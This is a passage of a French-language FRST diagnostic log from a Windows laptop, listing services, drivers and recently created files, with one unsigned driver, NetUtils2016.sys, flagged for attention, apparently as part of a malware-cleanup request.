IntelSSTSvc; C:\WINDOWS\system32\IntelSSTAPO\ParameterService\ParameterService.exe [25928 2015-12-02] (Intel Corporation) R2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [8704 2016-02-05] (Intel Corporation) [Fichier non signé] R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [209184 2016-02-11] (Intel Corporation) R3 QALSvc; C:\Program Files\Acer\Acer Quick Access\QALSvc.exe [440224 2016-03-10] (Acer Incorporated) R3 QASvc; C:\Program Files\Acer\Acer Quick Access\QASvc.exe [481696 2016-03-10] (Acer Incorporated) R3 UEIPSvc; C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe [291232 2016-02-01] (acer) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation) S4 Amazon 1Button App Service; "c:\Program Files (x86)\Amazon\Amazon1ButtonApp\Amazon1ButtonService64.Exe" [X] S4 AxVirtualAHCISrv; C:\Program Files (x86)\Alcohol Soft\Alcohol 52\AxAHCIServiceEx.exe [X] ===================== Pilotes (Avec liste blanche) ====================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R1 aswbidsdriver; C:\WINDOWS\system32\drivers\aswbidsdrivera.sys [319984 2017-06-28] (AVAST Software s.r.o.) R0 aswbidsh; C:\WINDOWS\system32\drivers\aswbidsha.sys [198944 2017-06-28] (AVAST Software s.r.o.) R0 aswblog; C:\WINDOWS\system32\drivers\aswbloga.sys [343264 2017-06-28] (AVAST Software s.r.o.) R0 aswbuniv; C:\WINDOWS\system32\drivers\aswbuniva.sys [57704 2017-06-28] (AVAST Software s.r.o.) S3 aswHdsKe; C:\WINDOWS\system32\drivers\aswHdsKe.sys [91304 2017-04-05] (AVAST Software) S3 aswHwid; C:\WINDOWS\system32\drivers\aswHwid.sys [46984 2017-06-28] (AVAST Software) R1 aswKbd; C:\WINDOWS\system32\drivers\aswKbd.sys [41800 2017-06-28] (AVAST Software) R2 aswMonFlt; C:\WINDOWS\system32\drivers\aswMonFlt.sys [146664 2017-06-28] (AVAST Software) R1 aswRdr; C:\WINDOWS\system32\drivers\aswRdr2.sys [110352 2017-06-28] (AVAST Software) R0 aswRvrt; C:\WINDOWS\system32\drivers\aswRvrt.sys [84392 2017-06-28] (AVAST Software) R1 aswSnx; C:\WINDOWS\system32\drivers\aswSnx.sys [1015848 2017-06-28] (AVAST Software) R1 aswSP; C:\WINDOWS\system32\drivers\aswSP.sys [585608 2017-06-28] (AVAST Software) R2 aswStm; C:\WINDOWS\system32\drivers\aswStm.sys [198768 2017-06-28] (AVAST Software) R0 aswVmm; C:\WINDOWS\system32\drivers\aswVmm.sys [360792 2017-06-28] (AVAST Software) R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2016-10-28] (Disc Soft Ltd) R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2016-10-28] (Disc Soft Ltd) R3 igfx; C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_82119d956c80af5a\igdkmd64.sys [11041776 2017-02-07] (Intel Corporation) R3 LMDriver; C:\WINDOWS\System32\drivers\LMDriver.sys [21408 2016-03-10] (Acer Incorporated) R1 NetUtils2016; C:\WINDOWS\system32\drivers\NetUtils2016.sys [909944 2017-06-28] () <==== ATTENTION R3 Qcamain10x64; C:\WINDOWS\System32\drivers\Qcamain10x64.sys [2344448 2017-03-18] (Qualcomm Atheros, Inc.) R3 RadioShim; C:\WINDOWS\System32\drivers\RadioShim.sys [14752 2016-03-10] (Acer Incorporated) R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [935168 2015-11-19] (Realtek ) R3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [769752 2015-12-18] (Realsil Semiconductor Corporation) S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] () R0 sptd2; C:\WINDOWS\System32\Drivers\sptd2.sys [179768 2016-10-28] (Duplex Secure Ltd) R3 SynRMIHID; C:\WINDOWS\system32\DRIVERS\SynRMIHID.sys [57448 2015-10-22] (Synaptics Incorporated) S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation) S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation) S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation) ==================== NetSvcs (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ==================== Un mois - Créés - fichiers et dossiers ======== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2017-06-29 11:26 - 2017-06-29 11:26 - 00000000 ____D C:\FRST 2017-06-29 11:25 - 2017-06-29 11:25 - 02440704 _____ (Farbar) C:\Users\Anaëlle Jolivet\Downloads\FRST64.exe 2017-06-28 23:13 - 2017-06-28 23:13 - 00000000 ____D C:\ProgramData\SWCUTemp 2017-06-28 20:18 - 2017-06-28 21:34 - 00010341 _____ C:\Users\Anaëlle Jolivet\Desktop\ZHPCleaner.txt 2017-06-28 20:11 - 2017-06-28 20:12 - 00000889 _____ C:\Users\Anaëlle Jolivet\Desktop\ZHPCleaner.lnk 2017-06-28 16:23 - 2017-06-28 16:23 - 02801024 _____ C:\Users\Anaëlle Jolivet\Downloads\ZHPCleaner.exe 2017-06-28 13:57 - 2017-06-28 13:57 - 00400464 _____ (AVAST Software) C:\WINDOWS\system32\aswBoot.exe 2017-06-28 13:55 - 2017-06-28 13:55 - 00000000 ____D C:\Users\Anaëlle Jolivet\AppData\Local\Antanna 2017-06-28 11:21 - 2017-06-28 17:08 - 00000000 ____D C:\Users\Anaëlle Jolivet\Desktop\VRS 2017-06-28 11:21 - 2017-06-28 11:21 - 00000000 ____D C:\Users\Anaëlle Jolivet\AppData\Local\AdvinstAnalytics 2017-06-28 11:15 - 2017-06-28 11:15 - 03061760 _____ (Nicolas Coolman) C:\Users\Anaëlle Jolivet\Downloads\ZHPFix.exe 2017-06-28 07:25 - 2017-06-28 07:25 - 00001092 _____ C:\Users\Anaëlle Jolivet\Desktop\Avast SafeZone Browser.lnk 2017-06-27 20:58 - 2017-06-27 20:58 - 02757504 _____ C:\Users\Anaëlle Jolivet\ZHPDiag3.exe 2017-06-27 20:52 - 2017-06-27 20:52 - 00315000 _____ C:\Users\Anaëlle Jolivet\Downloads\winchk_2.0.exe 2017-06-27 20:52 - 2017-06-27 20:52 - 00000784 _____ C:\WinChk.txt 2017-06-27 20:47 - 2017-06-27 20:47 - 00468480 _____ () C:\Users\Anaëlle Jolivet\Downloads\CKScanner.exe 2017-06-27 12:57 - 2017-06-27 12:58 - 00000776 _____ C:\DelFix.txt 2017-06-27 12:54 - 2017-06-27 12:54 - 00797760 _____ C:\Users\Anaëlle Jolivet\Downloads\delfix_1.013.exe 2017-06-27 12:51 - 2017-06-27 21:00 - 00000210 _____ C:\Users\Anaëlle 2017-06-27 12:50 - 2017-06-28 21:34 - 00000000 ____D C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP 2017-06-27 12:50 - 2017-06-28 16:23 - 00000000 ____D C:\Users\Anaëlle Jolivet\AppData\Local\ZHP 2017-06-27 12:49 - 2017-06-27 12:49 - 02755968 _____ C:\Users\Anaëlle Jolivet\Downloads\ZHPDiag3.exe 2017-06-27 12:47 - 2017-06-28 13:49 - 00000000 ____D C:\rei 2017-06-27 12:47 - 2017-06-28 13:48 - 00004372 _____ C:\WINDOWS\System32\Tasks\ReimageUpdater 2017-06-25 11:26 - 2017-06-25 11:36 - 367282088 _____ C:\Users\Anaëlle Jolivet\Downloads\Supernatural.S01E11.VOSTFR.WS.DVDRip.XviD-GKS.avi 2017-06-25 11:25 - 2017-06-25 11:27 - 367403040 _____ C:\Users\Anaëlle Jolivet\Downloads\Supernatural.S01E10.VOSTFR.WS.DVDRip.XviD-GKS.avi 2017-06-21 17:32 - 2017-06-21 17:44 - 367350722 _____ C:\Users\Anaëlle Jolivet\Downloads\Supernatural.S01E09.VOSTFR.WS.DVDRip.XviD-GKS.avi 2017-06-21 15:54 - 2017-06-21 16:04 - 367068864 _____ C:\Users\Anaëlle Jolivet\Downloads\Supernatural.S01E07.VOSTFR.WS.DVDRip.XviD-GKS.avi 2017-06-21 15:26 - 2017-06-21 15:33 - 367185922 _____ C:\Users\Anaëlle Jolivet\Downloads\Supernatural.S01E08.VOSTFR.WS.DVDRip.XviD-GKS.avi 2017-06-21 15:07 - 2017-06-21 15:20 - 367144820 _____ C:\Users\Anaëlle Jolivet\Downloads\Supernatural.S01E06.VOSTFR.WS.DVDRip.XviD-GKS.avi 2017-06-21 15:06 - 2017-06-21 15:38 - 367406558 _____ C:\Users\Anaëlle Jolivet\Downloads\Supernatural.S01E05.VOSTFR.WS.DVDRip.XviD-GKS.avi 2017-06-21 14:33 - 2017-06-21 14:50 - 367197780 _____ C:\Users\Anaëlle Jolivet\Downloads\Supernatural.S01E04.VOSTFR.WS.DVDRip.XviD-GKS.avi 2017-06-21 14:32 - 2017-06-21 14:50 - 115032064 _____ C:\Users\Anaëlle Jolivet\Downloads\Supernatural.S01E03.VOSTFR.WS.DVDRip.XviD-GKS.avi 2017-06-21 13:47 - 2017-06-21 14:01 - 367149150 _____ C:\Users\Anaëlle Jolivet\Downloads\Supernatural.S01E02.VOSTFR.WS.DVDRip.XviD-GKS.avi 2017-06-21 13:44 - 2017-06-21 14:09 - 367456150 _____ C:\Users\Anaëlle Jolivet\Downloads\Supernatural.S01E01.VOSTFR.WS.DVDRip.XviD-GKS.avi 2017-06-13 20:55 - 2017-06-03 12:15 - 01596600 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll 2017-06-13 20:55 - 2017-06-03 12:15 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe 2017-06-13 20:55 - 2017-06-03 12:15 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll 2017-06-13 20:55 - 2017-06-03 12:14 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2017-06-13 20:55 - 2017-06-03 12:14 - 01024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2017-06-13 20:55 - 2017-06-03 12:09 - 08318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2017-06-13 20:55 - 2017-06-03 12:09 - 01003624 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll 2017-06-13 20:55 - 2017-06-03 12:08 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll 2017-06-13 20:55 - 2017-06-03 12:07 - 00923048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll 2017-06-13 20:55 - 2017-06-03 12:07 - 00119712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys 2017-06-13 20:55 - 2017-06-03 12:02 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2017-06-13 20:55 - 2017-06-03 12:01 - 05477096 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll 2017-06-13 20:55 - 2017-06-03 12:00 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll 2017-06-13 20:55 - 2017-06-03 12:00 - 00219040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys 2017-06-13 20:55 - 2017-06-03 11:59 - 01409048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll 2017-06-13 20:55 - 2017-06-03 11:59 - 00626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe 2017-06-13 20:55 - 2017-06-03 11:59 - 00311200 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll 2017-06-13 20:55 - 2017-06-03 11:59 - 00259400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe 2017-06-13 20:55 - 2017-06-03 11:58 - 21352696 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2017-06-13 20:55 - 2017-06-03 11:58 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2017-06-13 20:55 - 2017-06-03 11:58 - 00254176 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll 2017-06-13 20:55 - 2017-06-03 11:55 - 02681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys 2017-06-13 20:55 - 2017-06-03 11:36 - 01150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll 2017-06-13 20:55 - 2017-06-03 11:35 - 02259768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll 2017-06-13 20:55 - 2017-06-03 11:28 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2017-06-13 20:55 - 2017-06-03 11:26 - 00266640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\capauthz.dll 2017-06-13 20:55 - 2017-06-03 11:23 - 20373920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2017-06-13 20:55 - 2017-06-03 11:23 - 06760024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2017-06-13 20:55 - 2017-06-03 11:23 - 00573856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll 2017-06-13 20:55 - 2017-06-03 11:20 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll 2017-06-13 20:55 - 2017-06-03 11:14 - 03673088 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2017-06-13 20:55 - 2017-06-03 11:14 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll 2017-06-13 20:55 - 2017-06-03 11:14 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll 2017-06-13 20:55 - 2017-06-03 11:12 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll 2017-06-13 20:55 - 2017-06-03 11:11 - 02958848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys 2017-06-13 20:55 - 2017-06-03 11:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll 2017-06-13 20:55 - 2017-06-03 11:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll 2017-06-13 20:55 - 2017-06-03 11:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll 2017-06-13 20:55 - 2017-06-03 11:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys 2017-06-13 20:55 - 2017-06-03 11:11 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll 2017-06-13 20:55 - 2017-06-03 11:10 - 00293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe 2017-06-13 20:55 - 2017-06-03 11:10 - 00102400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe 2017-06-13 20:55 - 2017-06-03 11:09 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll 2017-06-13 20:55 - 2017-06-03 11:09 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\devicengccredprov.dll 2017-06-13 20:55 - 2017-06-03 11:09 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll 2017-06-13 20:55 - 2017-06-03 11:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll 2017-06-13 20:55 - 2017-06-03 11:07 - 23682048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2017-06-13 20:55 - 2017-06-03 11:07 - 00778240 _____ C:\WINDOWS\system32\MBR2GPT.EXE 2017-06-13 20:55 - 2017-06-03 11:07 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll 2017-06-13 20:55 - 2017-06-03 11:07 - 00197120 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdboot.exe 2017-06-13 20:55 - 2017-06-03 11:07 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll 2017-06-13 20:55 - 2017-06-03 11:05 - 20506624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2017-06-13 20:55 - 2017-06-03 11:05 - 07336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2017-06-13 20:55 - 2017-06-03 11:05 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll 2017-06-13 20:55 - 2017-06-03 11:05 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll 2017-06-13 20:55 - 2017-06-03 11:05 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\devicengccredprov.dll 2017-06-13 20:55 - 2017-06-03 11:04 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2017-06-13 20:55 - 2017-06-03 11:04 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll 2017-06-13 20:55 - 2017-06-03 11:04 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll 2017-06-13 20:55 - 2017-06-03 11:03 - 19336192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2017-06-13 20:55 - 2017-06-03 11:03 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe 2017-06-13 20:55 - 2017-06-03 11:03 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll 2017-06-13 20:55 - 2017-06-03 11:02 - 08245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2017-06-13 20:55 - 2017-06-03 11:01 - 02804736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll 2017-06-13 20:55 - 2017-06-03 11:00 - 03379200 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll 2017-06-13 20:55 - 2017-06-03 11:00 - 00933376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe 2017-06-13 20:55 - 2017-06-03 11:00 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll 2017-06-13 20:55 - 2017-06-03 10:59 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2017-06-13 20:55 - 2017-06-03 10:59 - 02672128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll 2017-06-13 20:55 - 2017-06-03 10:59 - 02625024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll 2017-06-13 20:55 - 2017-06-03 10:59 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll 2017-06-13 20:55 - 2017-06-03 10:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys 2017-06-13 20:55 - 2017-06-03 10:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll 2017-06-13 20:55 - 2017-06-03 10:59 - 01142784 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll 2017-06-13 20:55 - 2017-06-03 10:59 - 00975360 _____ (Microsoft Corporation) C:\WINDOWS\HelpPane.exe 2017-06-13 20:55 - 2017-06-03 10:59 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll 2017-06-13 20:55 - 2017-06-03 10:58 - 05961216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2017-06-13 20:55 - 2017-06-03 10:58 - 02650112 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll 2017-06-13 20:55 - 2017-06-03 10:58 - 02516480 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll 2017-06-13 20:55 - 2017-06-03 10:58 - 01888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll 2017-06-13 20:55 - 2017-06-03 10:58 - 01046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll 2017-06-13 20:55 - 2017-06-03 10:58 - 00827392 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll 2017-06-13 20:55 - 2017-06-03 10:57 - 11870720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2017-06-13 20:55 - 2017-06-03 10:57 - 06535168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe 2017-06-13 20:55 - 2017-06-03 10:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll 2017-06-13 20:55 - 2017-06-03 10:57 - 02829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll 2017-06-13 20:55 - 2017-06-03 10:57 - 01675264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll 2017-06-13 20:55 - 2017-06-03 10:57 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll 2017-06-13 20:55 - 2017-06-03 10:57 - 00797184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe 2017-06-13 20:55 - 2017-06-03 10:56 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2017-06-13 20:55 - 2017-06-03 10:55 - 03656192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2017-06-13 20:55 - 2017-06-03 10:55 - 02132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll 2017-06-13 20:55 - 2017-06-03 10:55 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll 2017-06-13 20:55 - 2017-06-03 10:54 - 02341376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll 2017-06-13 20:55 - 2017-06-03 10:54 - 02298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll 2017-06-13 20:55 - 2017-06-03 10:53 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll 2017-06-13 20:55 - 2017-06-03 10:51 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\bfsvc.exe 2017-06-13 20:54 - 2017-06-03 12:10 - 00130464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys 2017-06-13 20:54 - 2017-06-03 12:00 - 00321376 _____ (Microsoft Corporation) C:\WINDOWS\system32\capauthz.dll 2017-06-13 20:54 - 2017-06-03 11:58 - 00660384 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll 2017-06-13 20:54 - 2017-06-03 11:57 - 00371616 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll 2017-06-13 20:54 - 2017-06-03 11:14 - 00443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll 2017-06-13 20:54 - 2017-06-03 11:14 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmredir.dll 2017-06-13 20:54 - 2017-06-03 11:10 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCredentialDeployment.exe 2017-06-13 20:54 - 2017-06-03 11:06 - 00551936 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll 2017-06-13 20:54 - 2017-06-03 11:01 - 06726656 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe 2017-06-07 23:00 - 2017-06-28 13:58 - 00061304 _____ () C:\WINDOWS\system32\Drivers\lpsport.sys 2017-06-07 23:00 - 2017-06-07 23:00 - 00061304 _____ () C:\WINDOWS\SMSS-PFRO79e3.tmp 2017-05-31 22:49 - 2017-05-31 22:49 - 00230840 _____ (TrueCrypt Foundation) C:\WINDOWS\system32\Drivers\truecrypt.sys 2017-05-31 22:43 - 2017-05-31 22:44 - 00000000 ____D C:\Program Files (x86)\Fast Folder Access 2017-05-31 22:43 - 2017-05-31 22:43 - 01133085 _____ C:\Users\Anaëlle Jolivet\Downloads\FFASetup.exe 2017-05-31 22:43 - 2017-05-31 22:43 - 00000000 ____D C:\Users\Anaëlle Jolivet\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Fast Folder Access 2017-05-31 18:37 - 2017-05-31 22:55 - 00000000 ____D C:\Users\Anaëlle Jolivet\Documents\Histoire 2017-05-31 18:34 - 2017-05-31 22:45 - 00000000 ____D C:\Users\Anaëlle Jolivet\AppData\Local\AxCrypt 2017-05-30 00:36 - 2017-05-20 10:22 - 01292288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll 2017-05-30 00:36 - 2017-05-20 10:10 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2017-05-30 00:35 - 2017-05-20 11:13 - 01333136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll 2017-05-30 00:35 - 2017-05-20 10:55 - 00606960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll 2017-05-30 00:35 - 2017-05-20 10:48 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe 2017-05-30 00:35 - 2017-05-20 10:47 - 01474800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll 2017-05-30 00:35 - 2017-05-20 10:46 - 05821496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll 2017-05-30 00:35 - 2017-05-20 10:46 - 01266544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll 2017-05-30 00:35 - 2017-05-20 10:46 - 00754080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll 2017-05-30 00:35 - 2017-05-20 10:45 - 00349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll 2017-05-30 00:35 - 2017-05-20 10:44 - 00519680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll 2017-05-30 00:35 - 2017-05-20 10:44 - 00181664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll 2017-05-30 00:35 - 2017-05-20 10:43 - 05802968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll 2017-05-30 00:35 - 2017-05-20 10:43 - 04672848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll 2017-05-30 00:35 - 2017-05-20 10:43 - 02424016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll 2017-05-30 00:35 - 2017-05-20 10:43 - 01529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll 2017-05-30 00:35 - 2017-05-20 10:43 - 01455592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll 2017-05-30 00:35 - 2017-05-20 10:43 - 01120864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll 2017-05-30 00:35 - 2017-05-20 10:43 - 00354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll 2017-05-30 00:35 - 2017-05-20 10:29 - 13840384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll 2017-05-30 00:35 - 2017-05-20 10:27 - 02199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll 2017-05-30 00:35 - 2017-05-20 10:27 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smartscreenps.dll 2017-05-30 00:35 - 2017-05-20 10:26 - 00059904 _____ C:\WINDOWS\SysWOW64\xboxgipsynthetic.dll 2017-05-30 00:35 - 2017-05-20 10:26 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll 2017-05-30 00:35 - 2017-05-20 10:25 - 00826368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSMDesktopProvider.dll 2017-05-30 00:35 - 2017-05-20 10:25 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll 2017-05-30 00:35 - 2017-05-20 10:24 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll 2017-05-30 00:35 - 2017-05-20 10:23 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll 2017-05-30 00:35 - 2017-05-20 10:22 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll 2017-05-30 00:35 - 2017-05-20 10:22 - 00394240 _____ (Microsoft Corporation) 